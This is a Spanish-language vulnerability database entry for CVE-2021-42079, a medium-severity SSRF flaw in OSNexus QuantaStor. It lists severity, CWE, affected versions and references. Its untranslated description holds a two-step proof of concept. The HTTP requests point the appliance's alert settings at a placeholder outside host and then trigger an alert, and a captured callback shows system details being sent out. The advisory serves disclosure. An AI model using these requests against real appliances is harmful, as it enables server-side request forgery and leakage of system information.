CVE-2021-42079
Gravedad CVSS v3.1:
MEDIA
Tipo:
CWE-918
Falsificación de solicitud en servidor (SSRF)
Fecha de publicación:
10/07/2023
Última modificación:
22/09/2025
Descripción
*** Pendiente de traducción *** An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.<br />
<br />
POC<br />
<br />
Step 1: Prepare the SSRF with a request like this:<br />
<br />
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<br />
HTTP/1.1<br />
<br />
Host: <br />
Accept-Encoding: gzip, deflate<br />
<br />
Accept: */*<br />
Accept-Language: en<br />
<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br />
<br />
Connection: close<br />
<br />
authorization: Basic <br />
Content-Type: application/json<br />
<br />
Content-Length: 0<br />
<br />
Step 2: Trigger this alert with this request<br />
<br />
GET /qstorapi/alertRaise?title=test&message=test&severity=1 <br />
HTTP/1.1<br />
<br />
Host: <br />
Accept-Encoding: gzip, deflate<br />
<br />
Accept: */*<br />
<br />
Accept-Language: en<br />
<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br />
<br />
Connection: close<br />
<br />
authorization: Basic <br />
Content-Type: application/json<br />
<br />
Content-Length: 1<br />
<br />
The post request received by looks like this:<br />
{<br />
<br />
### Python FLASK stuff ####<br />
<br />
&#39;endpoint&#39;: &#39;index&#39;, <br />
<br />
&#39;method&#39;: &#39;POST&#39;, <br />
<br />
&#39;cookies&#39;: ImmutableMultiDict([]), <br />
<br />
### END Python FLASK stuff ####<br />
<br />
<br />
&#39;data&#39;: b&#39;{ <br />
"attachments": [ <br />
{<br />
<br />
"fallback": "[122] test / test.",<br />
<br />
"color": "#aa2222",<br />
<br />
"title": "[122] test",<br />
<br />
"text": "test",<br />
<br />
"fields": [ <br />
{ <br />
<br />
"title": "Alert Severity",<br />
<br />
"value": "CRITICAL",<br />
<br />
"short": false <br />
}, { <br />
"title": "Appliance", <br />
"value": "quantastor (https://)",<br />
<br />
"short": true <br />
<br />
}, { <br />
<br />
"title": "System / Driver / Kernel Ver", <br />
<br />
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", <br />
<br />
"short": false <br />
<br />
}, { <br />
<br />
"title": "System Startup", <br />
<br />
"value": "Fri Aug 6 16-02-55 2021", <br />
<br />
"short": true <br />
<br />
}, { <br />
<br />
"title": "SSID", <br />
<br />
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7", <br />
<br />
"short": true <br />
<br />
},<br />
],<br />
<br />
"footer": "QuantaStor Call-home Alert",<br />
<br />
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",<br />
<br />
"ts": 1628461774<br />
}<br />
], <br />
"mrkdwn":true <br />
}&#39;, <br />
#### FLASK REQUEST STUFF #####<br />
<br />
&#39;headers&#39;: {<br />
<br />
&#39;Host&#39;: &#39;&#39;, <br />
&#39;User-Agent&#39;: &#39;curl/7.58.0&#39;, <br />
&#39;Accept&#39;: &#39;*/*&#39;, <br />
&#39;Content-Type&#39;: &#39;application/json&#39;, <br />
&#39;Content-Length&#39;: &#39;790&#39;<br />
<br />
}, <br />
&#39;args&#39;: ImmutableMultiDict([]), <br />
&#39;form&#39;: ImmutableMultiDict([]), <br />
&#39;remote_addr&#39;: &#39;217.103.63.173&#39;, <br />
&#39;path&#39;: &#39;/payload/58&#39;, <br />
&#39;whois_ip&#39;: &#39;TNF-AS, NL&#39;<br />
}<br />
<br />
#### END FLASK REQUEST STUFF #####
Impacto
Puntuación base 3.x
6.20
Gravedad 3.x
MEDIA
Productos y versiones vulnerables
| CPE | Desde | Hasta |
|---|---|---|
| cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:* | 6.0.0.355 (excluyendo) |
Para consultar la lista completa de nombres de CPE con productos y versiones, ver esta página
Referencias a soluciones, herramientas e información
- https://cisrt.divd.nl/DIVD-2021-00020/
- https://csirt.divd.nl/CVE-2021-42079
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
- https://csirt.divd.nl/CVE-2021-42079
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus



